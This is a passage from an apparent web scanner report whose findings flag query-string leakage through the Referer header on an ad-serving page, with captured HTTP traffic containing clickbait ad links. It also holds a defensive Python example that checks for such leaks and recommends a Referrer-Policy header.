The page was loaded from a URL containing a query string (the request below), and the response contains links to other domains (the cross-domain href and img src URLs in the response excerpt below).

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:31:24 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11">Shocking Joint Discovery</a></span>
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=17%2C75%2C76&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=17%2C75%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=17%2C75%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
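What findings 19.63 to 19.66 (and the identical ones around them) actually mean, as an added example that is neither the scanner's code nor anything belonging to serve.directdigitalllc.com: serve.php is loaded with a query string that carries the whole click-tracking chain (the click= parameter, including the advertising.com cstr and bnum identifiers), and the response links out to yads.zedo.com and c1142172.cdn.cloudfiles.rackspacecloud.com. Under the referrer policy browsers defaulted to when this report was generated (no-referrer-when-downgrade; these are plain-HTTP pages, so no downgrade applies) the full URL, query string included, is sent in the Referer header to each of those hosts whenever the image loads or the link is followed. None of the responses above sets a Referrer-Policy header. The Python below reproduces the check offline on a constructed, trimmed copy of the 19.63 request and response: it lists the foreign hosts the response references and the query parameters each one would receive, evaluating the Referrer Policy table so that a Referrer-Policy header or a rel="noreferrer" link opt-out downgrades the finding. The names referer_leaks, referer_for and the SAMPLE_* constants are this example's own.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit, urlunsplit

# Constructed sample, trimmed from the 19.63 request/response above: the long
# click-tracking URLs are shortened and only one ad slot is kept.
SAMPLE_URL = ("http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073"
              "&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197")
SAMPLE_HEADERS = {"Content-Type": "text/html; charset=UTF-8",
                  "Server": "Apache/2.2.16 (Amazon)"}      # no Referrer-Policy
SAMPLE_BODY = """<html><body><table><tr>
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);" target="_blank"
   href="http://yads.zedo.com/ads2/c?a=906408;n=1197"><img border="0"
   src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
<a href="/serve.php?bid=27">same host, never reported</a>
<a rel="noreferrer" href="http://crm.directdigitalllc.com/click?a=85">opted out</a>
</td></tr></table></body></html>"""

LEGACY_DEFAULT = "no-referrer-when-downgrade"        # browser default in 2011
MODERN_DEFAULT = "strict-origin-when-cross-origin"   # Chrome 85+ / Firefox 87+
POLICIES = frozenset({"no-referrer", "no-referrer-when-downgrade", "origin",
                      "origin-when-cross-origin", "same-origin", "strict-origin",
                      "strict-origin-when-cross-origin", "unsafe-url"})


class _LinkCollector(HTMLParser):
    """Collect the attributes that make a browser fetch or navigate to a URL."""
    URL_ATTRS = {("a", "href"), ("img", "src"), ("script", "src"),
                 ("iframe", "src"), ("link", "href"), ("form", "action")}

    def __init__(self):
        super().__init__()
        self.links = []          # (url, rel attribute value)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for t, a in self.URL_ATTRS:
            if tag == t and attrs.get(a):
                self.links.append((attrs[a], attrs.get("rel") or ""))


def referer_for(page_url, link_url, policy):
    """Referer value a browser sends when page_url references link_url under
    the given Referrer Policy; None means the header is omitted.  Fragment and
    userinfo are never sent; a downgrade is an https page referencing http."""
    p, l = urlsplit(page_url), urlsplit(urljoin(page_url, link_url))
    same_origin = (p.scheme, p.hostname, p.port) == (l.scheme, l.hostname, l.port)
    downgrade = p.scheme == "https" and l.scheme == "http"
    netloc = p.hostname + (f":{p.port}" if p.port else "")
    origin = f"{p.scheme}://{netloc}/"
    full = urlunsplit((p.scheme, netloc, p.path, p.query, ""))
    table = {
        "no-referrer": None,
        "no-referrer-when-downgrade": None if downgrade else full,
        "origin": origin,
        "origin-when-cross-origin": full if same_origin else origin,
        "same-origin": full if same_origin else None,
        "strict-origin": None if downgrade else origin,
        "strict-origin-when-cross-origin":
            full if same_origin else (None if downgrade else origin),
        "unsafe-url": full,
    }
    return table[policy]


def referer_leaks(page_url, headers, body, browser_default=LEGACY_DEFAULT):
    """Map each foreign host the response references to the query parameters
    of page_url the browser would reveal to it in the Referer header.  An empty
    dict means the check passes: no query string, no cross-domain links, or a
    policy / rel=noreferrer that withholds the query."""
    parts = urlsplit(page_url)
    if not parts.query:
        return {}
    hdrs = {k.lower(): v for k, v in headers.items()}
    policy = hdrs.get("referrer-policy", "").strip().lower()
    if policy not in POLICIES:           # absent or unknown value: browser default
        policy = browser_default
    params = sorted({k for k, _ in parse_qsl(parts.query, keep_blank_values=True)})
    collector = _LinkCollector()
    collector.feed(body)
    leaks = {}
    for url, rel in collector.links:
        host = urlsplit(urljoin(page_url, url)).hostname
        if not host or host == parts.hostname:
            continue                                   # same host: not cross-domain
        if "noreferrer" in rel.lower().split():
            continue                                   # per-link opt-out
        sent = referer_for(page_url, url, policy)
        if sent and urlsplit(sent).query:
            leaks.setdefault(host, params)
    return leaks


if __name__ == "__main__":
    for host, keys in referer_leaks(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY).items():
        print(f"{host}: receives {', '.join(keys)} in Referer")
```

Run against the sample with the legacy default, the check reports yads.zedo.com and the rackspacecloud.com CDN host, each receiving bid, click and t202id; the same-host link is ignored and the rel="noreferrer" link to crm.directdigitalllc.com is not reported. With browser_default=MODERN_DEFAULT the result is empty, because strict-origin-when-cross-origin sends only the origin to other hosts, which is why the cheapest fix for a site today is a Referrer-Policy: strict-origin-when-cross-origin response header (none of the responses above has one). The example does not model the meta name="referrer" tag or the per-element referrerpolicy attribute, which override the header when present.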

19.67. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string (the request below), and the response contains links to other domains (the cross-domain href and img src URLs in the response excerpt below).

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:26:15 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11">How to Relieve Joints?</a></span>
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=1%2C17%2C125&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/gdsussbdf4.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11">Shocking Joint Discovery</a></span>
<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.68. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:41:41 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.69. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
